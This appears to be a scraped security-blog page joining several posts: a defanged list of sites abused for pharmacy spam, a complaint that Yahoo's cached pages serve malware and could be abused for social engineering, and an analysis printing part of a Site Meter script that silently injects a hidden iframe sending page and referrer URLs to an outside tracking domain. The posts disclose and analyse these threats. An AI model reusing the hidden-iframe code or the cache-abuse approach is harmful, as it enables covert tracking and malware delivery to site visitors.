hxxp://www.cruisersforum.com/forums/members/inxgwo32-30799.html
hxxp://www.daanbantayan.gov.ph/dbforums/viewtopic.php?f=26&t=43370
hxxp://www.daanbantayan.gov.ph/dbforums/viewtopic.php?f=28&t=43373
hxxp://www.divingleisurelondon.co.uk/forum/online-zocor
hxxp://www.drugs-s.com/product-35-prd_12.html
hxxp://www.elakiri.com/forum/showthread.php?p=6341304
hxxp://www.europeanirish.com/index.php?med_id=buy-zocor-(simvastatin)-10-mg
hxxp://www.europeanirish.com/index.php?med_id=buy-zocor-(simvastatin)-40-mg
hxxp://www.fastcompany.com/tag/pharmacy
hxxp://www.feld.com/blog/archives/2007/02/buy-zocor-online.html
hxxp://www.feld.com/blog/archives/2007/02/online-buy-zocor-without-a-prescription.html
hxxp://www.fioricetpharmacy.info/product.php?prod=Zocor
hxxp://www.flexyx.com/Z/Zocor.html
hxxp://www.folkd.com/go/zocor+lipitor
hxxp://www.forkncork.com/?p=80540
hxxp://www.forkncork.com/?p=80544
hxxp://www.freecodesource.com/user/profile-354708.html
hxxp://www.freecodesource.com/user/profile-354802.html
hxxp://www.genbrand-rx.com/Zocor.html
hxxp://www.genericmedsfromcanada.com/
hxxp://www.genericmedsfromcanada.com/ZOCOR_80_mg_GENERIC_SIMVASTATIN_80_mg_28_Tabs_p/sim0753b.htm
hxxp://www.genericsmed.com/buy-cheap-generic-zocor-simvastatin-p-21.html
hxxp://www.genv.net/en-us/node/10875
hxxp://www.giustiziere.org/viewtopic.php?f=7&t=10277
hxxp://www.globaltrainingcenter.com/news.php?node=1412
hxxp://www.globaltrainingcenter.com/news.php?node=682
hxxp://www.goprocamera.com/admin/_js/tiny_mce/themes/advanced/files/buying-zocor-legally.html
hxxp://www.goprocamera.com/admin/_js/tiny_mce/themes/advanced/files/buy-zocor-without-a-prescription.html
hxxp://www.gradcats.org/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=2&node=2156
hxxp://www.gradcats.org/index.php?option=com_content&view=section&layout=blog&id=1&Itemid=2&node=3753
hxxp://www.gripenet.pt/blog/?p=80521
hxxp://www.gripenet.pt/blog/?p=80528
hxxp://www.hcs.harvard.edu/~salient/site/?menus=715
hxxp://www.hip-hop.net/profile/buyzocorG9FG
hxxp://www.hip-hop.net/profile/Fredmd
hxxp://www.hkcd-team.net/viewtopic.php?f=7&t=284
hxxp://www.ibiblio.org/agray/brushd/cheapest-price-for-zocor-40-mg.html
hxxp://www.ibiblio.org/agray/brushd/does-effect-have-libido-womens-zocor.html
hxxp://www.inansurucukursu.com/inan/forum/index.php?topic=2153.0;wap2
hxxp://www.inyoursuburb.com.au/forum/viewtopic.php?f=25&t=12069
hxxp://www.ipetitions.com/petition/buy_ambien_online_480/
hxxp://www.kucasnova.net/index.php?topic=1911.0
hxxp://www.kucasnova.net/index.php?topic=2378.0
hxxp://www.last.fm/user/zocor7103
hxxp://www.lerpg.com/forum/index.php?topic=1716.0
hxxp://www.livestrong.com/zocor-side-effects/
hxxp://www.mahalo.com/answers/drugs/where-can-you-buy-lipitor-online-is-it-cheaper
hxxp://www.makingthings.com/wiki/document.zocor-online-order
hxxp://www.masterseek.com/q/Zocor/0/1/Zocor.htm
hxxp://www.mathleagueforum.com/viewtopic.php?f=2&t=41
hxxp://www.menieresforum.com/?q=node/132
hxxp://www.michwine.com/index.php?Itemid=148&option=com_jcalpro&Subitem=3562
hxxp://www.michwine.com/index.php?Itemid=148&option=com_jcalpro&Subitem=773
hxxp://www.mister-wong.com/topics/zocor/
hxxp://www.mombu.com/hdtv/hdtv/t-buy-lipitor-online-no-prescription-needed-3828654.html
hxxp://www.mypage.com/buyzocor862/extendedprofile
hxxp://www.nfu.org/forum/archive/index.php?t-20956.html
hxxp://www.numberstemplates.com/forums/showthread.php?t=977
hxxp://www.offshorerx.com/drug/buy_generic_zocor.htm
hxxp://www.online-drugstore-usa.com/cheap_cardiovascular_prices/buy_generic_zocor_pills
hxxp://www.onlinepillspro.com/buy/zocor.html
hxxp://www.oxygenoverkill.com/forum/viewtopic.php?f=2&t=15
hxxp://www.pharmacyescrow.com/s3737-s-ZOCOR.aspx
hxxp://www.pharmacyescrow.com/s41524-s-ZOCOR.aspx
hxxp://www.photography-now.net/help/index?no-rx=1475
hxxp://www.photography-now.net/katja_oluscha_grunther/index?no-rx=3348
hxxp://www.pillsforall.com/cholesterol-lowering/zocor-40mg-generic-x-60/prod_57.html
hxxp://www.pillwatch.com/product/zocor/
hxxp://www.postnewsline.com/2009/04/the-post-new-website.html
hxxp://www.praktikum.de/forum/online-zocor-purchase-prescription-zocor-t12436.html
hxxp://www.psicologico.cl/?favorite=4356
hxxp://www.pyzam.com/profile/3304209
hxxp://www.pyzam.com/profile/3304382
hxxp://www.rfidtalk.com/showthread.php?p=19119
hxxp://www.rottentomatoes.com/vine/showthread.php?p=16528906
hxxp://www.rottentomatoes.com/vine/showthread.php?t=709353
hxxp://www.scribd.com/doc/25364786/buy-cheap-Generic-Zocor-Simvastatin-20mg-online-without-prescription
hxxp://www.server2go-web.de/forumng/index.php?topic=111147.0
hxxp://www.spurs11.com/forum/showthread.php?t=69947
hxxp://www.teamhallpass.com/2010/01/post-80522-buy-zocor/
hxxp://www.teamhallpass.com/2010/01/post-80527-about-zocor/
hxxp://www.technieuws.org/?p=83598
hxxp://www.technieuws.org/?p=83620
hxxp://www.tempuspharmacy.org/zocor-drug-information.html
hxxp://www.theartofthepossible.net/?p=83620
hxxp://www.theunforsaken.com/viewtopic.php?f=3&t=7668&p=8971
hxxp://www.thisis50.com/xn/detail/784568:Topic:18648223?xg_source=activity
hxxp://www.travelersnation.com/forum/post774.html
hxxp://www.tumblr.com/tagged/saints+&amp%3B+sinners
hxxp://www.twit88.com/home/node/10117
hxxp://www.valuepharmaceuticals.com/medicine/index.php
hxxp://www.wehopres.org/?p=83620
hxxp://www.wikio.com/article/122956318
hxxp://www.wikio.com/sports/football/football_players/michael_koenen
hxxp://www.wizard101.pl/forum/buy-zocor-drugs-online-zocor-t296.html
hxxp://www.world-drugs.net/order_generic_zocor.php
hxxp://www.xlpharmacy.com/
hxxp://www.xlpharmacy.com/generic-zocor/
hxxp://www.zenpharmacy.com/Zocor/buy-prescription-Zocor-online.html
hxxp://zocoronline130.typepad.com/blog/2010/01/buy-zocor-estrogen.html
hxxp://36poker.ru/forum/index.php?topic=2188.0
hxxp://ad-bu.chavalar.com/forum/index.php?topic=124.0
hxxp://alexatutor.com/viewtopic.php?f=2&t=838&p=915
hxxp://articlet.com/article7179.html
hxxp://bb.obscurusfio.com/index.php?topic=279.msg406
hxxp://bb.peak2010.org/viewtopic.php?f=2&t=31619
hxxp://bbs.qqcipher.com/viewtopic.php?f=2&t=51
hxxp://benthanhgold.com/forum/viewtopic.php?f=8&t=1487
hxxp://biblioteca.uniminuto.edu/index.php/biblioteca-en-cifras/1297?task=view&page=975
hxxp://bigcuzinent.com/forum/index.php?topic=29.0
hxxp://blog.see3.net/?p=484
hxxp://blogs.inquirer.net/m-ph/2008/08/29/nikon-d90-official-1st-dslr-with-hd-video-recording/
hxxp://boards.tx-outdoors.com/viewtopic.php?f=2&t=343
hxxp://buycheapviagra.ca/kamagra.html
hxxp://buycialis20mg.com/buy-kamagra-soft-tabs.htm
hxxp://buy-kamagra-online.net/
hxxp://carolinadelnorte.jomc.unc.edu/?optin=com_pharma&rr=buy-kamagra-viagra-india.php
hxxp://carolinaweek.jomc.unc.edu/?option_pharma=viagra-uk-kamagra.php
hxxp://centovacast.com/viewtopic.php?f=9&t=182
hxxp://centovacast.com/viewtopic.php?f=9&t=218
hxxp://chemisaxli.gov.ge/forum/viewtopic.php?id=76060
hxxp://citkim.phpbboy.com/viewtopic.php?f=2&t=734&p=734
hxxp://community.bonnaroo.com/service/displayKickPlace.kickAction?u=13803616&as=12058
hxxp://community.essence.com/forum/topics/how-to-buy-online-kamagra
hxxp://cooperation-of-benzin.de/viewtopic.php?f=2&t=3726
hxxp://district9140ng.org/index.php?topic=11.0
hxxp://ekkanisayoluganda.org.uk/furum/index.php?topic=19289.0
hxxp://essenceonline.ning.com/forum/topics/buy-kamagra-drugsorder-chep
hxxp://fahrerservice.org/viewtopic.php?f=2&t=1830
hxxp://fanclub.darabubamara.eu/viewtopic.php?f=3&t=2701
hxxp://fanclub.darabubamara.eu/viewtopic.php?f=4&t=2687
hxxp://feelmaldives.com/forum/viewtopic.php?f=2&t=36
hxxp://foorum.kundaliniyoga.ee/viewtopic.php?f=2&t=5526
hxxp://fora.an-archos.com/viewtopic.php?t=134335&sid=f3287141aaa40ea1970e3e8d53279b27
hxxp://forocientifico.com/viewtopic.php?f=2&t=179
hxxp://foros.comfusion.es/index.php?topic=675.0
hxxp://forum.acme.nu/index.php?topic=12.0
hxxp://forum.ampirstyle.ru/viewtopic.php?f=6&t=53
hxxp://forumas.vtv.lt/index.php?topic=4192.0
hxxp://forum.atlaspronet.net/showthread.php?t=80150
hxxp://forum.autonews.fr/index.php?showtopic=42109&view=getlastpost
hxxp://forum.auto.ro/showthread.php?t=505005
hxxp://forum.cudaswiata.pl/viewtopic.php?f=6&t=488
hxxp://forum.cudaswiata.pl/viewtopic.php?f=7&t=485
hxxp://forum.dayment.com/viewtopic.php?f=14&t=19
hxxp://forum.delifisek.net/index.php?topic=6.0
hxxp://forum.djlanka.com/viewtopic.php?f=2&t=20547
hxxp://forum.egypt.com/enforum/programming-languages-f84/buy-cheap-generic-kamagra-online-kamagra-no-prescription-39580.html
hxxp://forum.faazmagazine.com/index.php?topic=153.0
hxxp://forum.familyguy.cz/viewtopic.php?f=6&t=1215
hxxp://forum.fsbw.de/viewtopic.php?f=1&t=543
hxxp://forum.geotorrents.com/index.php?showtopic=455183&view=getnewpost
hxxp://forum.gwteambuilder.de/index.php?topic=1516.0
hxxp://forum.im1music.net/index.php?topic=13695.0
hxxp://forum.jurutera.net/viewtopic.php?f=5&t=6
hxxp://forum.jzip.com/archive/index.php/t-194030.html
hxxp://forum.livetoride.cz/viewtopic.php?f=2&t=5
hxxp://forum.masseriadelpino.it/viewtopic.php?f=2&t=850
hxxp://forum.matura.pl/viewtopic.php?f=4&t=17054
hxxp://forum.matura.pl/viewtopic.php?f=7&t=17150
hxxp://forum.montages-electroniques.com/viewtopic.php?t=5824&sid=a19708674cddb891449e7c154a5fbaaa
hxxp://forum.muzsweet.com/viewtopic.php?f=4&t=3502&p=23454
hxxp://forum.opensourceassets.com/index.php?topic=10.0
hxxp://forum.parrucchieritalia.it/viewtopic.php?f=3&t=1374
hxxp://forum.plovdivairport.com/index.php?topic=8792.0
hxxp://forum.pngarnet.ac.pg/viewtopic.php?f=2&t=36593
hxxp://forum.pngarnet.ac.pg/viewtopic.php?f=2&t=36701
hxxp://forum.polymus.ru/index.php?topic=2345.0;wap2
hxxp://forum.rimsketoplice.net/viewtopic.php?f=5&t=721
hxxp://forums.beerke.nl/viewtopic.php?f=4&t=4319
hxxp://forums.deviationsonline.com/viewtopic.php?f=7&t=407
hxxp://forums.deviationsonline.com/viewtopic.php?f=7&t=421
hxxp://forum.sibautobroker.ru/viewtopic.php?f=5&t=4
hxxp://forums.salug.org/index.php?action=printpage;topic=286.0
hxxp://forums.stevengould.org/viewtopic.php?t=37126&sid=964c4c68b15e636529dbd54f2ab791a3
hxxp://forum.ti.itb.ac.id/index.php?topic=2844.0
hxxp://forum.toniderassi.com/viewtopic.php?f=5&t=25
hxxp://forum.transimagovideo.com/index.php?topic=34.0
hxxp://forum.ultravnc.fr/index.php?topic=2274.0
hxxp://forum.wayfinder.com/index.php?topic=40.0;wap2
hxxp://generics-sale.com/product/kamagra-soft-flavoured.html
hxxp://generic-viagra-kamagra.com/
hxxp://generic-viagra-kamagra.com/kamagra.php
hxxp://habbo-aktuell.net/forum/viewtopic.php?f=5&t=1640
hxxp://heldentaten-gilde.com/viewtopic.php?f=6&t=41
hxxp://innfromthenight.com/forum/viewtopic.php?f=14&t=52817
hxxp://jeepinohio.com/forum/viewtopic.php?f=8&t=3712
hxxp://khaz.de/viewtopic.php?f=2&t=1051
hxxp://knolstuff.com/forum/topics/buy-kamagra-online-1
hxxp://laissezfaire.ru/viewtopic.php?f=3&t=4282
hxxp://laser-inkjet-labels.com/viewtopic.php?f=2&t=228
hxxp://laser-inkjet-labels.com/viewtopic.php?f=2&t=57
hxxp://legalrxlist.com/
hxxp://letterheadforemail.com/Kamagra.html
hxxp://medicine.bizrate.co.uk/oid651048929.html
hxxp://medicine.bizrate.co.uk/oid651048949.html
hxxp://messageboard.wrolc.org/index.php?action=printpage;topic=2811.0
hxxp://messageboard.wrolc.org/index.php/topic,2811.msg2826.html
hxxp://my.superbasket.gr/viewtopic.php?f=4&t=1592
hxxp://online-pill-store.com/
hxxp://paintballtokod.hu/forum/viewtopic.php?f=2&t=6
hxxp://permai.gov.my/forum/viewtopic.php?f=3&t=22558
hxxp://picpost.rootsee.com/index.php?topic=150.0
hxxp://pokerqc.ca/viewtopic.php?f=4&t=667
hxxp://poradny.rodinaaja.cz/viewtopic.php?f=4&t=703
hxxp://pravoedelo-spb.ru/forum/viewtopic.php?f=2&t=5
hxxp://program.kralchat.net/kamagra.html
hxxp://realmomsguide.sheknows.com/?q=kamagra
hxxp://redrum-demos.net/forum/index.php?topic=672.0;wap2
hxxp://registrar.fiu.edu/typo3_cache/a/index.html
hxxp://rozbeans.com/forum/viewtopic.php?p=15276
hxxp://sietereinos.com/viewtopic.php?f=8&t=10
hxxp://sitagu.info/community/index.php?topic=49.0
hxxp://slowebdev.net/viewtopic.php?f=4&t=6
hxxp://snsdfan.com/forum/viewtopic.php?f=2&t=4
hxxp://socbaytravel.com/forum/viewtopic.php?f=4&t=603
hxxp://socbaytravel.com/forum/viewtopic.php?f=4&t=697
hxxp://sonsofanarchyboards.com/viewtopic.php?f=2&t=12
hxxp://sorsogon.gov.ph/discussion/viewtopic.php?f=2&t=47576
hxxp://southernorcleague.com/forums/index.php?topic=149.0
hxxp://spainleds.com/viewtopic.php?f=2&t=965
hxxp://tatilyorum.net/viewtopic.php?f=2&t=7
hxxp://techexchange.packeteer.com/viewtopic.php?f=4&p=18467
hxxp://theevonyforum.com/post1915.html
hxxp://thememoryhole.org/?s=kandu+v
hxxp://thewallsoflove.com/forums/viewtopic.php?f=4&t=8
hxxp://thisis50.ning.com/xn/detail/784568:Topic:18422720?xg_source=activity
hxxp://thisis50.ning.com/xn/detail/784568:Topic:18869853?xg_source=activity
hxxp://tra.tools4noobs.com/support-f2/where-buy-kamagra-online-the-lowest-drugs-online-offers-t88.html
hxxp://twit88.com/home/node/9933
hxxp://velociteen.com/forum/index.php?action=printpage;topic=1643.0
hxxp://virb.com/cialiss91m
hxxp://vitsearkiv.net/viewtopic.php?f=9&t=34
hxxp://waltham2.financialchat.com/blogs/online-generic-kamagra-without-prescription
hxxp://web.kc.ac.th/viewtopic.php?f=2&t=1454
hxxp://web.kc.ac.th/viewtopic.php?f=2&t=1578
hxxp://www.365pharmacy.co.uk/
hxxp://www.3tabs.com/viagra/kamagra.html
hxxp://www.acauch.com/foro/viewtopic.php?f=2&t=4
hxxp://www.alismed.com/
hxxp://www.arvuroma.it/forum/viewtopic.php?f=2&t=2131
hxxp://www.bacila.com/forum/viewtopic.php?f=3&t=3925
hxxp://www.backyardsteamtrains.com/viewtopic.php?f=2&t=659
hxxp://www.bellspharmacy.com/
hxxp://www.bellspharmacy.com/category/4/kamagra.html
hxxp://www.bestpharmacy4u.com/kamagra/
hxxp://www.blogcatalog.com/topic/buy+kamagra+oral+jelly+uk/
hxxp://www.blogcatalog.com/topic/kamagra+100mg/
hxxp://www.britishsteelcollection.org.uk/index.php?option=com_contact&view=contact&id=6:community&catid=45:sponsors&Itemid=59
hxxp://www.bvkportal.com/phpbb3/viewtopic.php?f=4&t=20
hxxp://www.carolinamartialartsforum.com/viewtopic.php?f=7&t=39
hxxp://www.caverta-silagra.com/
hxxp://www.cheapest-prescription-drugs.biz/
hxxp://www.classicrockmagazine.com/forum/viewtopic.php?f=4&t=733&p=8913
hxxp://www.classicrockmagazine.com/forum/viewtopic.php?f=9&p=8914
hxxp://www.clubprivedesire.com/forum/viewtopic.php?f=6&t=257
hxxp://www.coffeeshopnieuwvennep.nl/viewtopic.php?f=2&t=471
hxxp://www.columbusunderground.com/wonder-bread-bakery-in-italian-village-to-close
hxxp://www.daanbantayan.gov.ph/dbforums/viewtopic.php?f=9&t=1419
hxxp://www.devourofmugthol.com/forums/index.php?topic=109.0
hxxp://www.drontlen.com/forum/viewtopic.php?f=4&t=253&p=374
hxxp://www.drontlen.com/forum/viewtopic.php?f=4&t=259
hxxp://www.ekaport.ru/forum/showthread.php?t=14099
hxxp://www.ekaport.ru/forum/showthread.php?t=14127
hxxp://www.family-online-pharmacy.com/purchase_men___s_health_generic/
hxxp://www.family-online-pharmacy.com/purchase_men___s_health_generic/buy_cheap_brand_kamagra_oral_jelly_online.html
hxxp://www.folkd.com/go/kamagra+ajanta+pharma
hxxp://www.forodevinos.com/viewtopic.php?f=3&t=55
hxxp://www.forum4voip.com/viewtopic.php?f=1&t=38125
hxxp://www.forum.tripudiolatino.it/viewtopic.php?f=2&t=165
hxxp://www.freewebs.com/costaescorts/
hxxp://www.geistheiler24.de/forum/viewtopic.php?f=11&p=5217
hxxp://www.generatedata.com/forums/index.php?topic=2351.msg2495
hxxp://www.getdarker.com/forums/viewtopic.php?f=3&t=5797&start=0
hxxp://www.gourmet.com/forums/message.jspa?messageID=1481
hxxp://www.healthpharmarx.com/
hxxp://www.hollywood.com/Forums/Home.aspx?plckForumPage=ForumDiscussion&plckDiscussionId=Cat%3ACelebsForum%3A41Discussion%3Ac7c7096b-9895-497f-bb0d-a79fd53fc8f1
hxxp://www.homegrow.me/where-to-buy-mestinon-online-fast-worldwide-shipping-the-m-t504.html
hxxp://www.hunglay.com/webboard/index.php?action=printpage;topic=26.0
hxxp://www.hunglay.com/webboard/index.php?topic=26.0
hxxp://www.infotop.ro/forum/viewtopic.php?f=2&t=4
hxxp://www.inox.tarrea.cl/foro/index.php?showtopic=68&view=old
hxxp://www.ireallywantviagra.com/2009/11/cheap-kamagra-oral-jelly.html
hxxp://www.jamespot.com/a/188474-Buy-Kamagra-Online.html
hxxp://www.jobsstack.com/forum/index.php?action=printpage;topic=4405.0
hxxp://www.jomc.unc.edu/
hxxp://www.joomlatemplatesearcher.com/forum/index.php?action=printpage;topic=7362.0
hxxp://www.joomlatemplatesearcher.com/forum/index.php?topic=7362.msg%msg_id%
hxxp://www.kamagra.in/India-Kamagra.htm
hxxp://www.kamagra-online.co.uk/aurogratablets.asp
hxxp://www.kamagrastore.co.uk/
hxxp://www.kamagratop.com/
hxxp://www.led-tv-fernseher.de/forum/viewtopic.php?f=4&t=4
hxxp://www.makinem.net/forum/index.php?topic=952.0
hxxp://www.malerxpharmacy.com/product/sildenafil-kamagra.html
hxxp://www.minco.com/community/members/Dr+Levitra.aspx
hxxp://www.mister-wong.com/topics/buy+cheapest/
hxxp://www.mister-wong.com/topics/kamagra/
hxxp://www.mypage.com/viagralive/weblog
hxxp://www.nnenyy-cs.info/viewtopic.php?f=8&t=943
hxxp://www.oktmilya.ru/viewtopic.php?p=13782
hxxp://www.onlinemedicalstore.net/
hxxp://www.online-pharmacy-usa.com/men___s_health_drugs/buy_propecia_online
hxxp://www.oxygenoverkill.com/forum/viewtopic.php?f=2&t=4
hxxp://www.partyoffers.co.uk/forum/read.php?19,400,400
hxxp://www.pdsanlazzaro.it/forum/viewtopic.php?f=3&t=2878
hxxp://www.perlenhimmel.at/viewtopic.php?p=16661
hxxp://www.photoactions.co.uk/Discount-Kamagra.htm
hxxp://www.photoactions.co.uk/Jelly_Kamagra_Liquid.htm
hxxp://www.phtclub.be/viewtopic.php?f=8&t=253
hxxp://www.pills2go.com/
hxxp://www.pioneer-physicaltherapy.com/buy-generic-kamagra+soft-online.html
hxxp://www.portaldocuidador.com/forum/viewtopic.php?f=6&t=4212
hxxp://www.promiana-bg.com/forum/index.php?action=printpage;topic=3072.0
hxxp://www.promiana-bg.com/forum/index.php?topic=2777.0
hxxp://www.ps3planet.it/forum/viewtopic.php?f=4&t=10090
hxxp://www.pyzam.com/profile/3318196
hxxp://www.pyzam.com/profile/3318197
hxxp://www.realpharmacyrx.com/
hxxp://www.reasonfrontier.com/index.php?action=printpage;topic=2791.0
hxxp://www.redleafwands.com/ehsrp/index.php?action=printpage;topic=14534.0
hxxp://www.rfidtalk.com/showthread.php?p=18965
hxxp://www.rhettmiller.com/forum/viewtopic.php?f=3&t=1449
hxxp://www.rottentomatoes.com/vine/showthread.php?p=16465556
hxxp://www.rugbyveneto.org/phpbb//viewtopic.php?t=59630
hxxp://www.scribd.com/doc/23935277/Buy-Kamagra-Online-Without-Prescription-Best-Place-to-Buy-Kamagra
hxxp://www.scribd.com/doc/25069184/buy-Brand-Kamagra-oral-jelly-Sildenafil-citrate-100mg-online-without-prescription
hxxp://www.sharpmeds.com/
hxxp://www.simpy.com/user/mastsiagoel/tag/generic4all
hxxp://www.skaly.sk/viewtopic.php?f=6&t=3009
hxxp://www.skydsl.org/forum/viewtopic.php?p=12035&sid=594e5b80965d00e1ae83a04c1ee6eb5c
hxxp://www.skydsl.org/forum/viewtopic.php?t=5999&sid=2254d3872dbd467413cde299664fd2a8
hxxp://www.somalinet.com/forums/viewtopic.php?f=8&t=231252
hxxp://www.songstowearpantsto.com/forum/viewtopic.php?f=3&t=118055
hxxp://www.ssteve.nl/forum/viewtopic.php?f=2&t=105
hxxp://www.stalkerzone.de/forum/viewtopic.php?f=3&t=2568
hxxp://www.stalkerzone.de/forum/viewtopic.php?f=5&t=2642&p=22695
hxxp://www.surcentro.com/en/info/www.kamagrarx.com
hxxp://www.tebene.de/Members/Kamagra/buy-kamagra-online-paypal-payment
hxxp://www.thegeneric-viagra.net/
hxxp://www.thegreatpotdebate.com/forum/topic48.html?sid=ac9e1defb50abca2e1cff33a76d91bdb
hxxp://www.theviagrastore.com/kamagra-generic-store-1095.html
hxxp://www.thewealthacademy.co.uk/index.php?topic=1135.0
hxxp://www.tuneando.es/index.php?action=printpage;topic=1705.0
hxxp://www.tuneando.es/index.php?topic=1705.0
hxxp://www.vertifight.com/forum/viewtopic.php?f=3&p=63126
hxxp://www.vibeystars.nl/index.php?topic=35.0
hxxp://www.vinilkosmo-mp3.com/forum/index.php?topic=201.0
hxxp://www.wbahealth.com/product_brand_kamagra_soft_online.html
hxxp://www.wordcountbuddies.com/wcb_forum_test/viewtopic.php?f=4&p=286
hxxp://www.worstpreviews.com/forums/showthread.php?p=42881
hxxp://www.xlpharmacy.com/ed-jelly/
hxxp://www.xlpharmacy.com/Kamagra/
hxxp://www.xmaspharmacy.com/kamagra-oral-jelly-100mg-p-59.html
hxxp://www.xmaspharmacy.com/resource/index.html
hxxp://www.your-best-drugstore.com/
hxxp://www.zeroegg.cn/viewtopic.php?f=4&t=10674

UPDATE: On 3/9/2010, hxxp://runbetterpoker.com/viewtopic.php?f=4&t=887 was removed from the list at the owner’s request. Software used to run the forum whose vulnerability led to the recent abuse has been removed.

Yahoo, has allowed users, for several years, to use the “cached pages” options displayed along with its search results on Yahoo-Search. Yahoo has partnered with McAfee’s SearchScan to provide safer searches since about May 2008. This is all good. The intention of providing safer searches to visitors is very noble. Google too, has led the pack in this direction by opening up its SafeBrowsing API and by providing visual warnings in search results boldly claiming “Warning visiting this website may harm your computer”.

Stopthehacker.com  has tried to communicate with executives at Yahoo since April 2009 about the potential problems that we have been observing in their cached pages. This has not been met with any real response.

The problem is simple, but very important. Cached versions of web pages displayed on Yahoo Search often contain malware code embedded in them. This is a phenomenon that we have observed repeatedly.

Consider one of our many attempts at communicating this issue to Yahoo (message shortened for brevity).

We have found that Yahoo’s cache results, even with SearchScan on, do not detect the presence of malware on its cached copies of webpages. I have attached some screen shots which prove the point.

Our scanners flagged the code in the cached copies right away. The site in question, for which I looked up Yahoo’s cache is http://www.xxxxxxxx.com

More info on our response to this site is available at http://xxxxxxxxxx.xxx/**stripped**

The screen shots attached with this post show an example of a website which was scraped by Yahoo’s spider, indexed and cached and then when accessed via its search results, pops up the malware code. There does not seem to be any kind of sanitization/scrubbing process going on in the background.

Worryingly, this problem gives rise to a very effective attack vector, where a malicious individual can compromise a site or even simply create a site that contains malicious code. Once the site is crawled by Yahoo’s spider, and is loaded in the cache, the link to this cached page becomes an excellent attack vector to use for social engineering, as it carries the sense of security that comes with Yahoo’s brand name. No need to exploit XSS/CSRF, no back-breaking hours of toil and sweat need to be put in discovering flaws in a site. Just get the infected pages cached in Yahoo! and voila, you have a live exploit launched from official Yahoo property.

Consider the fact that Yahoo search has 18% of the search market in October 2009, the number of visitors to the site is non-trivial! Moreover, Yahoo’s brand image can suffer, if this phenomenon becomes more wide spread or well-known.

Given my failed efforts to discuss this with Yahoo, at this point, I can only hope that this does not become more popular.

I cannot understand how Yahoo is employing SearchScan technology to provide safer search results to visitors, yet fails at the back-end to identify cached pages loaded with malware.

Till next time.

We had a look at our logs, local dumps and analysis and saw that the Site Meter script was pushing in an iFrame pointing to dg.specificclick.net using a body-onload event to trigger the event. Interestingly, dg.spe cificclick.net, has been associated with multiple cases of Internet misdemeanor. [0] [1] [2] [3] [4]

It is surprising to see companies that have widely established customer bases to link to questionable content.

The code from the Site Meter script is presented below, the offending part is clearly visible.

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
 init:function( sCodeName, sServerName, sSecurityCode )
 ** code removed for brevity **
 onPageLoad:function()
 { 

 var newIFrame = document.createElement("iframe");
 newIFrame.frameBorder = 0;
 newIFrame.width = 0;
 newIFrame.height = 0;
 newIFrame.src = "http://dg.specif icclick.net/?u=" + encodeURIComponent(document.location) + "&r=" + encodeURIComponent(SiteMeter.getReferralURL()); 

** code removed for brevity **

SiteMeter.init('s29rottweilers', 's29.sitemeter.com', ''); 

var g_sLastCodeName = 's29rottweilers';
// ]]>

The SafeBrowsing report from Google about this site follows:

• Google SafeBrowsing report – www.schwarzerwaldrottweilers.com

What is the current listing status for schwarzerwaldrottweilers.com?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 6 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-11-24, and the last time suspicious content was found on this site was on 2009-11-24.
Malicious software includes 8 trojan(s), 2 worm(s). Successful infection resulted in an average of 16 new process(es) on the target machine.

Malicious software is hosted on 11 domain(s), including 89.138.243.0/, donnelscreekfarm.com/, ho-fashion.com/.

This site was hosted on 1 network(s) including AS26496 (PAH).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, schwarzerwaldrottweilers.com appeared to function as an intermediary for the infection of 11 site(s) including tillieiszler.blogspot.com/, ghadaghadadolbier.blogspot.com/, adansharlott.blogspot.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 11 domain(s), including tillieiszler.blogspot.com/, ghadaghadadolbier.blogspot.com/, adansharlott.blogspot.com/.